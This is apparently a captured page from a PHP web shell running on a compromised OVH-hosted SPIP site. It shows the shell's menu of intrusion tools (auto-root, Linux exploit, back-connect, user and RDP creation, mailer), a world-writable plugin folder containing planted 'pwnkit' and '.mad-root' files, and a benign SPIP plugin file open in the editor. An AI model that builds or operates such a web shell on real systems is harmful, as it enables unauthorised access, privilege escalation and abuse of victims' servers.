Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins /
auto /
breves /
v3.2.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
action
[ DIR ]
drwxrwxrwx
base
[ DIR ]
drwxrwxrwx
formulaires
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
prive
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.gitignore
92
B
-rw-rw-rw-
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
718
B
-rw-rw-rw-
README.md
86
B
-rw-rw-rw-
backend-breves.html
3.03
KB
-rw-rw-rw-
breve.html
2.95
KB
-rw-rw-rw-
breves_administrations.php
2.25
KB
-rw-rw-rw-
breves_autoriser.php
4.64
KB
-rw-rw-rw-
breves_ieconfig.php
641
B
-rw-rw-rw-
breves_pipelines.php
9.78
KB
-rw-rw-rw-
composer.json
416
B
-rw-rw-rw-
install.log
132
B
-rw-rw-rw-
paquet.xml
1.76
KB
-rw-rw-rw-
phpcs.xml.dist
433
B
-rw-rw-rw-
phpstan-baseline.neon
7.46
KB
-rw-rw-rw-
phpstan.neon.dist
184
B
-rw-rw-rw-
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : breves_administrations.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Fichier gérant l'installation et désinstallation du plugin * * @package SPIP\Breves\Installation **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Installation/maj des tables de brèves * * Crée les tables SQL du plugin (spip_breves) * * @param string $nom_meta_base_version * Nom de la meta informant de la version du schéma de données du plugin installé dans SPIP * @param string $version_cible * Version du schéma de données dans ce plugin (déclaré dans paquet.xml) */ function breves_upgrade($nom_meta_base_version, $version_cible) { // cas particulier : // si plugin pas installe mais que la table existe // considerer que c'est un upgrade depuis v 1.0.0 // pour gerer l'historique des installations SPIP <=2.1 if (!isset($GLOBALS['meta'][$nom_meta_base_version])) { $trouver_table = charger_fonction('trouver_table', 'base'); if ( $desc = $trouver_table('spip_breves') and isset($desc['exist']) and $desc['exist'] ) { ecrire_meta($nom_meta_base_version, '1.0.0'); } // si pas de table en base, on fera une simple creation de base } $maj = []; $maj['create'] = [ ['maj_tables', ['spip_breves']], ]; include_spip('base/upgrade'); maj_plugin($nom_meta_base_version, $version_cible, $maj); } /** * Désinstallation du plugin * * Supprime les tables SQL du plugin (spip_breves) * * @param string $nom_meta_base_version * Nom de la meta informant de la version du schéma de données du plugin installé dans SPIP **/ function breves_vider_tables($nom_meta_base_version) { sql_drop_table('spip_breves'); effacer_meta('activer_breves'); effacer_meta($nom_meta_base_version); }
Close